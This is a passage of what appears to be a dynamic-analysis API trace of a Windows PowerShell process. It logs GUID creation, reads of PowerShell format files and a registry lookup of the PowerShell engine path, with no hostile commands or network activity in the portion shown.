	[0733.603] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x345da38d, Data2=0x6257, Data3=0x4df9, Data4=([0]=0xb6, [1]=0x2c, [2]=0x80, [3]=0xa0, [4]=0x63, [5]=0x1, [6]=0x21, [7]=0xb7))) returned 0x0
	[0733.603] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xce964ef0, Data2=0x5c57, Data3=0x4ea2, Data4=([0]=0xae, [1]=0x67, [2]=0x51, [3]=0x20, [4]=0x9a, [5]=0xfa, [6]=0x4c, [7]=0x17))) returned 0x0
	[0733.604] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xde2cd50d, Data2=0xd545, Data3=0x4026, Data4=([0]=0x8c, [1]=0x75, [2]=0xe3, [3]=0x63, [4]=0xf8, [5]=0x11, [6]=0xc3, [7]=0xf))) returned 0x0
	[0733.605] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xdbf5acc9, Data2=0xcf64, Data3=0x4877, Data4=([0]=0x91, [1]=0xcb, [2]=0xd9, [3]=0xfe, [4]=0x96, [5]=0x8c, [6]=0x6a, [7]=0xa))) returned 0x0
	[0733.606] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xda6ce10b, Data2=0x4801, Data3=0x4232, Data4=([0]=0xb0, [1]=0x98, [2]=0x3d, [3]=0x2a, [4]=0xce, [5]=0xac, [6]=0x75, [7]=0x5e))) returned 0x0
	[0733.606] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xccb768f8, Data2=0x95c4, Data3=0x4ed5, Data4=([0]=0xb9, [1]=0x23, [2]=0x10, [3]=0x2e, [4]=0x32, [5]=0x32, [6]=0x34, [7]=0xee))) returned 0x0
	[0733.607] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x9174828d, Data2=0xaf15, Data3=0x49e3, Data4=([0]=0xa1, [1]=0x9c, [2]=0xd4, [3]=0x76, [4]=0x9c, [5]=0xc0, [6]=0x57, [7]=0x5b))) returned 0x0
	[0733.607] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x31502c01, Data2=0x1168, Data3=0x4365, Data4=([0]=0x83, [1]=0x46, [2]=0x12, [3]=0x85, [4]=0xf8, [5]=0x5f, [6]=0xb7, [7]=0x3e))) returned 0x0
	[0733.607] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xac5b17b3, Data2=0xf833, Data3=0x4c59, Data4=([0]=0x89, [1]=0x77, [2]=0x3f, [3]=0xf7, [4]=0x9f, [5]=0xf7, [6]=0xd7, [7]=0x58))) returned 0x0
	[0733.607] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xeba9dc4a, Data2=0x7d37, Data3=0x4515, Data4=([0]=0xb5, [1]=0x44, [2]=0x27, [3]=0xa1, [4]=0x41, [5]=0x8e, [6]=0x75, [7]=0x65))) returned 0x0
	[0733.607] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x44419d64, Data2=0x1b3b, Data3=0x480d, Data4=([0]=0x89, [1]=0x38, [2]=0xb7, [3]=0xb6, [4]=0x7c, [5]=0x26, [6]=0x71, [7]=0x4d))) returned 0x0
	[0733.608] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x1fe0f33e, Data2=0x48d2, Data3=0x46e1, Data4=([0]=0x9a, [1]=0x50, [2]=0x7b, [3]=0x92, [4]=0x5b, [5]=0xff, [6]=0xda, [7]=0xdf))) returned 0x0
	[0733.608] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0733.608] GetFileType (hFile=0x2e4) returned 0x1
	[0733.608] SetErrorMode (uMode=0x1) returned 0x1
	[0733.608] GetFileType (hFile=0x2e4) returned 0x1
	[0733.608] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.609] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.610] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.610] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.610] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.611] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.612] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.612] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.612] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.612] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.613] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.613] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.613] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.614] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.614] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0xe67, lpOverlapped=0x0) returned 1
	[0733.614] ReadFile (in: hFile=0x2e4, lpBuffer=0x30cfe37, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30cfe37*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0733.615] ReadFile (in: hFile=0x2e4, lpBuffer=0x30d0868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x30d0868*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0733.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x2e4) returned 0x0
	[0733.621] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0733.621] CoTaskMemAlloc (cb=0x5a) returned 0x1b976350
	[0733.621] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976350, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0733.621] CoTaskMemFree (pv=0x1b976350) 
	[0733.621] RegCloseKey (hKey=0x2e4) returned 0x0
	[0733.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0733.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0733.623] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x81cf95c2, Data2=0xd12d, Data3=0x4365, Data4=([0]=0xa7, [1]=0xcc, [2]=0x33, [3]=0x6c, [4]=0xdf, [5]=0xcb, [6]=0x5c, [7]=0xaf))) returned 0x0
	[0733.623] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcca9e259, Data2=0x27d1, Data3=0x4efc, Data4=([0]=0x9d, [1]=0xfd, [2]=0x1c, [3]=0xc3, [4]=0xd2, [5]=0xcd, [6]=0x93, [7]=0x3e))) returned 0x0
	[0733.623] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xf67b5fb8, Data2=0x3661, Data3=0x4dfd, Data4=([0]=0x8f, [1]=0xe7, [2]=0x5c, [3]=0x32, [4]=0x14, [5]=0x21, [6]=0x22, [7]=0x61))) returned 0x0
	[0733.623] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x99011bd9, Data2=0x1dd3, Data3=0x402a, Data4=([0]=0xad, [1]=0xa4, [2]=0x62, [3]=0xf1, [4]=0xef, [5]=0xca, [6]=0xab, [7]=0xae))) returned 0x0
	[0733.623] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xc0ff86a6, Data2=0xc117, Data3=0x46d6, Data4=([0]=0xab, [1]=0xb0, [2]=0x17, [3]=0x2f, [4]=0xa, [5]=0x23, [6]=0xbc, [7]=0x73))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xc41efa73, Data2=0xab0a, Data3=0x47fb, Data4=([0]=0xa0, [1]=0xc3, [2]=0x61, [3]=0xf7, [4]=0x65, [5]=0x41, [6]=0xf1, [7]=0x7))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x239fcce7, Data2=0xb6d9, Data3=0x4b14, Data4=([0]=0xa4, [1]=0xee, [2]=0x57, [3]=0xcc, [4]=0xa1, [5]=0x5e, [6]=0x38, [7]=0xab))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x5a22e3da, Data2=0xae05, Data3=0x460c, Data4=([0]=0x83, [1]=0x98, [2]=0xd6, [3]=0xad, [4]=0x8e, [5]=0x0, [6]=0xe5, [7]=0x2))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x6f080d02, Data2=0x8a82, Data3=0x4c65, Data4=([0]=0x87, [1]=0xf0, [2]=0x15, [3]=0x28, [4]=0xcc, [5]=0x60, [6]=0x16, [7]=0x83))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xfb9b5592, Data2=0xcc8c, Data3=0x440e, Data4=([0]=0xb0, [1]=0xec, [2]=0x5b, [3]=0x9, [4]=0x9e, [5]=0xb4, [6]=0xaa, [7]=0xf4))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x3e4671da, Data2=0x1648, Data3=0x47ea, Data4=([0]=0x86, [1]=0x1e, [2]=0x50, [3]=0x5c, [4]=0xb3, [5]=0x1c, [6]=0x5, [7]=0x20))) returned 0x0
	[0733.624] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x92eb111f, Data2=0x68d1, Data3=0x4e12, Data4=([0]=0x86, [1]=0xf2, [2]=0x63, [3]=0x83, [4]=0x76, [5]=0x24, [6]=0x7, [7]=0x58))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x30e6261c, Data2=0x2f52, Data3=0x456a, Data4=([0]=0xac, [1]=0xd5, [2]=0xf9, [3]=0x76, [4]=0xf6, [5]=0x90, [6]=0xd4, [7]=0x0))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd0e45baf, Data2=0xe69b, Data3=0x49d4, Data4=([0]=0x86, [1]=0x9b, [2]=0xe3, [3]=0x4c, [4]=0x56, [5]=0xb7, [6]=0xc, [7]=0x74))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x4cb7fbf5, Data2=0x6b5d, Data3=0x4b2d, Data4=([0]=0x9c, [1]=0x56, [2]=0x1f, [3]=0x2b, [4]=0xee, [5]=0x54, [6]=0xb5, [7]=0x66))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xf2329a5c, Data2=0x6f78, Data3=0x4512, Data4=([0]=0x8b, [1]=0x51, [2]=0xc7, [3]=0x80, [4]=0xe4, [5]=0x67, [6]=0xf7, [7]=0x70))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x1e919a22, Data2=0xdcbe, Data3=0x46ff, Data4=([0]=0xa4, [1]=0x51, [2]=0x60, [3]=0x20, [4]=0x4, [5]=0xc0, [6]=0xde, [7]=0x55))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x2c76d555, Data2=0x4204, Data3=0x4440, Data4=([0]=0xb7, [1]=0xf8, [2]=0xd5, [3]=0xf0, [4]=0x1e, [5]=0x22, [6]=0x1, [7]=0x48))) returned 0x0
	[0733.625] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x736805cc, Data2=0xcb24, Data3=0x44a5, Data4=([0]=0x97, [1]=0xb3, [2]=0xb0, [3]=0x3c, [4]=0x76, [5]=0xe2, [6]=0x90, [7]=0xf0))) returned 0x0
	[0733.626] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xfd44d470, Data2=0xddc6, Data3=0x4398, Data4=([0]=0xab, [1]=0x26, [2]=0xde, [3]=0x58, [4]=0x27, [5]=0xd5, [6]=0x37, [7]=0xc))) returned 0x0
	[0733.626] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x35b5c273, Data2=0xc949, Data3=0x42cb, Data4=([0]=0x97, [1]=0xa6, [2]=0xd5, [3]=0xa1, [4]=0x40, [5]=0x89, [6]=0x60, [7]=0xb2))) returned 0x0
	[0733.626] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x60eb368b, Data2=0x3a69, Data3=0x46a7, Data4=([0]=0x8f, [1]=0x35, [2]=0xe1, [3]=0xe, [4]=0xca, [5]=0x54, [6]=0xb0, [7]=0x97))) returned 0x0
	[0733.626] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xe9faf827, Data2=0xb7af, Data3=0x4b88, Data4=([0]=0x9d, [1]=0x7f, [2]=0x6a, [3]=0xfb, [4]=0x50, [5]=0x68, [6]=0xde, [7]=0xc4))) returned 0x0
	[0733.626] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x7d3b3afa, Data2=0xffec, Data3=0x4456, Data4=([0]=0x99, [1]=0x87, [2]=0x19, [3]=0x28, [4]=0x98, [5]=0xc7, [6]=0x28, [7]=0xa7))) returned 0x0
	[0733.626] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x156588f4, Data2=0xc3b2, Data3=0x4019, Data4=([0]=0x85, [1]=0x4c, [2]=0x40, [3]=0x3f, [4]=0xb7, [5]=0x81, [6]=0xb1, [7]=0x2e))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x8472100c, Data2=0x18e7, Data3=0x4977, Data4=([0]=0xa9, [1]=0x59, [2]=0xad, [3]=0xc4, [4]=0x3e, [5]=0x70, [6]=0xb7, [7]=0x7b))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd8965d21, Data2=0x6e93, Data3=0x445b, Data4=([0]=0x92, [1]=0x1d, [2]=0x6f, [3]=0xe, [4]=0x61, [5]=0xd8, [6]=0xcd, [7]=0x84))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xfa2a9bb2, Data2=0x700, Data3=0x4d0a, Data4=([0]=0x8e, [1]=0x54, [2]=0xa7, [3]=0x73, [4]=0x27, [5]=0x61, [6]=0xfb, [7]=0x30))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x7a055d44, Data2=0xe327, Data3=0x4c20, Data4=([0]=0x84, [1]=0x52, [2]=0x4b, [3]=0xa8, [4]=0xf, [5]=0x75, [6]=0x6f, [7]=0xef))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x59b3d889, Data2=0xbf7f, Data3=0x4294, Data4=([0]=0x87, [1]=0xe9, [2]=0x62, [3]=0x95, [4]=0x17, [5]=0x7e, [6]=0xcf, [7]=0x0))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd62c8b39, Data2=0xb278, Data3=0x41e1, Data4=([0]=0xa3, [1]=0x68, [2]=0x15, [3]=0x11, [4]=0x10, [5]=0xbe, [6]=0x91, [7]=0xb))) returned 0x0
	[0733.627] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x99a11147, Data2=0x63f5, Data3=0x4dc9, Data4=([0]=0xa3, [1]=0xcd, [2]=0xcc, [3]=0x8, [4]=0xe5, [5]=0x94, [6]=0x90, [7]=0x4e))) returned 0x0
	[0733.628] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x2e5d0cb3, Data2=0xa21d, Data3=0x465e, Data4=([0]=0xb7, [1]=0xd9, [2]=0xde, [3]=0xa2, [4]=0xee, [5]=0x2b, [6]=0xb7, [7]=0x8))) returned 0x0
	[0733.629] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xa33b9c45, Data2=0xf6bc, Data3=0x420c, Data4=([0]=0xaf, [1]=0x2e, [2]=0x2c, [3]=0xaa, [4]=0xbc, [5]=0x64, [6]=0x47, [7]=0xa3))) returned 0x0
	[0733.629] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x475e2d71, Data2=0x92cb, Data3=0x4036, Data4=([0]=0x89, [1]=0xcb, [2]=0xc, [3]=0xee, [4]=0x54, [5]=0x4, [6]=0x96, [7]=0xab))) returned 0x0
	[0733.629] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xd36f7dd0, Data2=0xb6a3, Data3=0x4f0d, Data4=([0]=0x9c, [1]=0x2b, [2]=0x4a, [3]=0xc, [4]=0xa0, [5]=0x6e, [6]=0x8a, [7]=0xf4))) returned 0x0
	[0733.629] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xcc0f859a, Data2=0xe99e, Data3=0x4708, Data4=([0]=0x9a, [1]=0x4f, [2]=0xff, [3]=0xac, [4]=0x22, [5]=0x18, [6]=0x87, [7]=0x16))) returned 0x0
	[0733.629] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x60dc7fd6, Data2=0x38dd, Data3=0x4afd, Data4=([0]=0x9c, [1]=0xc6, [2]=0xef, [3]=0x5, [4]=0x32, [5]=0x61, [6]=0x4c, [7]=0x49))) returned 0x0
	[0733.630] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x2f3707d2, Data2=0x2301, Data3=0x45ce, Data4=([0]=0xb5, [1]=0x83, [2]=0xec, [3]=0x9b, [4]=0x8d, [5]=0x6e, [6]=0x6e, [7]=0xf3))) returned 0x0
	[0733.630] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xfc32a460, Data2=0x186e, Data3=0x40b7, Data4=([0]=0xb8, [1]=0xb4, [2]=0x51, [3]=0xb, [4]=0x9, [5]=0x6e, [6]=0xbb, [7]=0x51))) returned 0x0
	[0733.630] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x87033533, Data2=0x2bda, Data3=0x4857, Data4=([0]=0x8e, [1]=0x9e, [2]=0x46, [3]=0xdb, [4]=0xd5, [5]=0x84, [6]=0x41, [7]=0x18))) returned 0x0
	[0733.630] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x6f612e09, Data2=0x83bf, Data3=0x46a7, Data4=([0]=0xb8, [1]=0x26, [2]=0xb4, [3]=0xdd, [4]=0x81, [5]=0x8, [6]=0x4a, [7]=0x47))) returned 0x0
	[0733.630] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x4a6ffb16, Data2=0xd25c, Data3=0x4a44, Data4=([0]=0x96, [1]=0xd6, [2]=0x26, [3]=0x6f, [4]=0x73, [5]=0xc2, [6]=0x4, [7]=0xdc))) returned 0x0
	[0733.630] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xb802d2df, Data2=0xd234, Data3=0x4eed, Data4=([0]=0xaf, [1]=0xf3, [2]=0xea, [3]=0x2a, [4]=0xfe, [5]=0x61, [6]=0x75, [7]=0xb7))) returned 0x0
	[0733.631] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x2603cbc3, Data2=0xcd2e, Data3=0x4e23, Data4=([0]=0xaa, [1]=0xf5, [2]=0xee, [3]=0x71, [4]=0x1b, [5]=0xfb, [6]=0x32, [7]=0xc7))) returned 0x0
	[0733.631] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x7cb26c54, Data2=0xd8a9, Data3=0x4f8d, Data4=([0]=0x8b, [1]=0x77, [2]=0x75, [3]=0xc, [4]=0x2f, [5]=0xcd, [6]=0x79, [7]=0xa4))) returned 0x0
	[0733.631] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x73d9dfb0, Data2=0xeea6, Data3=0x4286, Data4=([0]=0x9b, [1]=0x25, [2]=0x9f, [3]=0x37, [4]=0x37, [5]=0x20, [6]=0x4e, [7]=0x81))) returned 0x0
	[0733.631] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x8dd9fb37, Data2=0xa149, Data3=0x450a, Data4=([0]=0xa9, [1]=0x79, [2]=0x80, [3]=0xda, [4]=0x2c, [5]=0x21, [6]=0x6f, [7]=0xb8))) returned 0x0
	[0733.631] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0733.631] GetFileType (hFile=0x2e4) returned 0x1
	[0733.631] SetErrorMode (uMode=0x1) returned 0x1
	[0733.632] GetFileType (hFile=0x2e4) returned 0x1
	[0733.632] ReadFile (in: hFile=0x2e4, lpBuffer=0x305e958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305e958*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.632] ReadFile (in: hFile=0x2e4, lpBuffer=0x305e958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305e958*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.632] ReadFile (in: hFile=0x2e4, lpBuffer=0x305e958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305e958*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.632] ReadFile (in: hFile=0x2e4, lpBuffer=0x305e958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305e958*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0733.632] ReadFile (in: hFile=0x2e4, lpBuffer=0x305e958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305e958*, lpNumberOfBytesRead=0xed098*=0x8b4, lpOverlapped=0x0) returned 1
	[0733.633] ReadFile (in: hFile=0x2e4, lpBuffer=0x305dd74, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x305dd74*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
